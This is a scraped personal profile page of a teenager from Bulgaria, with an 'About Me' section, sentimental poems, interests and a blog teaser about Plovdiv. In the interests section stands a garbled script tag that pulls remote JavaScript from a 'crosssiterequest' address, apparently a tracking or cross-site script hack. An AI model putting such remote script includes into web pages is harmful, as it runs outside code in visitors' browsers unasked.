BaBy_BiBi profile picture


wAIt TiLl U sEE mA OoOoO! ..

About Me

I am From Bulgaria ! I am 17 .I speak English and French .. and i am learning Spanish . As many people on my age and not only i love going out with friends.. I cant live without music.. i love dancing and singing. yeah i want to be a singer one day! who knows:) i play piano more than 11 years.. i love it! i love the nature and the animals ... i hate when somebody destroys the nature and hurts animals... ! stay real! if you have questions just ask!
Elica Todorova and Stoqn Qnkulov VODA
Bulgarian entry on Eurovision 2007
bulgaria evrovision 2007
check this out.. vote for me.. thanks..
You are now marked on my profile visitor map!IF I KNEW
If I knew it would be the last time
That I'd see you fall asleep,
I would tuck you in more tightly
and pray the Lord, your soul to keep.
If I knew it would be the last time
that I see you walk out the door,
I would give you a hug and kiss
and call you back for one more.
If I knew it would be the last time
I'd hear your voice lifted up in praise,
I would video tape each action and word,
so I could play them back day after day.
If I knew it would be the last time,
I could spare an extra minute
to stop and say "I love you,"
instead of assuming you would KNOW I do.
If I knew it would be the last time
I would be there to share your day,
Well I'm sure you'll have so many more,
so I can let just this one slip away.
For surely there's always tomorrow
to make up for an oversight,
and we always get a second chance
to make everything just right.
There will always be another day
to say "I love you,"
And certainly there's another chance
to say our "Anything I can do?"
But just in case I might be wrong,
and today is all I get,
I'd like to say how much I love you
and I hope we never forget.
Tomorrow is not promised to anyone,
young or old alike,
And today may be the last chance
you get to hold your loved one tight.
So if you're waiting for tomorrow,
why not do it today?
For if tomorrow never comes,
you'll surely regret the day,
That you didn't take that extra time
for a smile, a hug, or a kiss
and you were too busy to grant someone,
what turned out to be their one last wish.
So hold your loved ones close today,
and whisper in their ear,
Tell them how much you love them
and that you'll always hold them dear
Take time to say "I'm sorry,"
"Please forgive me," "Thank you," or "It's okay."
And if tomorrow never comes,
you'll have no regrets about today. *
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My Interests

yeahhh thats my bro!!

I'd like to meet:

cool people.. from all over the world.....i love meeting new don't think.. just write .. hah...


don't chaaaaa love her ...


nip/thuck... love that movie hope that one day i will be a plastic surgeon ....... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document.write("..1...{}");}..


Written with a pen
Sealed with a kiss
If you are my friend,
Please answer this:
Are we friends or are we not?
You told me once, but I forgot.
So tell me now and tell me true,
So I can say, I am here for you.
Of all the friends I've ever met,
You're the ones I won't forget.
And if I die before you do,
I'll go to Heaven
And wait for you.


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My Blog


  PICTURES BY GEORGY VELICHKOV   Pictures of Plovdiv the second largest town in Bulgaria... the town where i was born.... :)     SOFIA the capital of Bulgria &nb...
Posted by BaBy_BiBi on Sun, 29 Oct 2006 09:21:00 PST